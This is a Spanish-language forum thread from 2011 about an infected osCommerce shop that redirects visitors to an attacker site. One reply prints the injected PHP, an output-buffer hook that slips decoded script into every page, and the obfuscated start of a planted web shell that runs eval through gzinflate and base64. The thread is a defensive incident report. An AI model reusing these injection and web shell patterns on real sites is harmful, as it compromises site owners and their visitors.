Foros del Web » Soporte técnico » Virus, troyanos y spyware »

OSCommerce Infectado

Estas en el tema de OSCommerce Infectado en el foro de Virus, troyanos y spyware en Foros del Web. Saludos Tengo un problema con una web basada en Oscommerce, cuando se entra en la web automáticamente se redirecciona a esta otra web atacante: http://winsantivirusbaden.com/index.php?06abQDIxQRaXVT7/qCsy38OvfjE+MiZtelsPInf8W15QM8d4QSLXftY70Fwki8dWHH ...
  #1 (permalink)  
Antiguo 30/03/2011, 16:19
 
Fecha de Ingreso: marzo-2011
Mensajes: 2
Antigüedad: 13 años, 7 meses
Puntos: 0
OSCommerce Infectado

Saludos

Tengo un problema con una web basada en Oscommerce, cuando se entra en la web automáticamente se redirecciona a esta otra web atacante: http://winsantivirusbaden.com/index.php?06abQDIxQRaXVT7/qCsy38OvfjE+MiZtelsPInf8W15QM8d4QSLXftY70Fwki8dWHH Y=#sfgh20hfgGFYUHJtfgyuhjgHUIJ

La redirección ocurre aleatoriamente, creo que la primera vez que te conectas.. aunque si repites la conexión acaba entrando en la tienda sin redireccionarse.

El problema es que no sé cual será el script que esta cargando esa dirección y tampoco como buscarlo... por supuesto el agujero de seguridad que (creo) pudo ser causa de una intrusión ya fue corregido.

Cualquier ayuda es importante.
Gracias!!!!

Última edición por dariodafoz; 31/03/2011 a las 03:48
  #2 (permalink)  
Antiguo 31/03/2011, 03:57
 
Fecha de Ingreso: marzo-2011
Mensajes: 2
Antigüedad: 13 años, 7 meses
Puntos: 0
Respuesta: OSCommerce Infectado

Hola

ya encontré todas la paginas con código inyectado, y lo corregí. Más abajo escribo el código inyectado en la muchos php y también un php metido en la carpeta images (new_products_rss.php) con un código diferente.

Lo que ahora me preocupa es el cómo pudieron modificar los permisos a 777 cuando estaban a 775, estoy casi convencido de que no obtuvieron la contraseña por FTP... aunque por supuesto la modifique por seguridad. Había instalado un módulo de compra sin registro el cual me deje la carpeta instaladora... un error grave de seguridad, pero no sé si a partir de ahí pudieron obtener permisos a otras carpetas... si así fue puedo respirar tranquilo. (el módulo PWA coje permisos a archivos como login..etc, que son justamente los que estaban con código inyectado... eso debió ser).

Pues por si es de interés escribo el código inyectado:

if(!$ob_starting) {
function ob_start_flush($s) {
$tc = array(0, 69, ..., 51); una buena lista númerica
$tr = array(51, ... , ) una buena lista númerica
$ob_htm = ''; foreach($tr as $tval) {
$ob_htm .= chr($tc[$tval]+32);
}

$slw=strtolower($s);
$i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);}
if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</body');if($i){$i--;}}
if(!$i){$i=strlen($s);if($i){$i--;}}
$i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);

return $s;
}
$ob_starting = time();
@ob_start("ob_start_flush");
} ?>

Y el archivo new_productos_rss.php además de lo anterior tenía lo siguiente:

<?php $auth_pass="";$color="#df5";$default_action='Files Man';$default_use_ajax=true;$default_charset='Wind ows-1251';preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x 61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65 \x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNk Wf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlu.. . ETCETERA...


Un saludo
  #3 (permalink)  
Antiguo 02/04/2011, 22:30
 
Fecha de Ingreso: febrero-2010
Ubicación: chile
Mensajes: 9
Antigüedad: 14 años, 8 meses
Puntos: 0
Respuesta: OSCommerce Infectado

hola dariodafoz, tengo exactamente el mismo problema y por lo que veo es complicado ya que osCommerce no tiene parches. Google tiene el sitio bloqueado y firefox también.
Tengo un respaldo limpio pero tengo miedo que se me vuelva a infectar.

Saludos!

Etiquetas: infectado, oscommerce
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 12:20.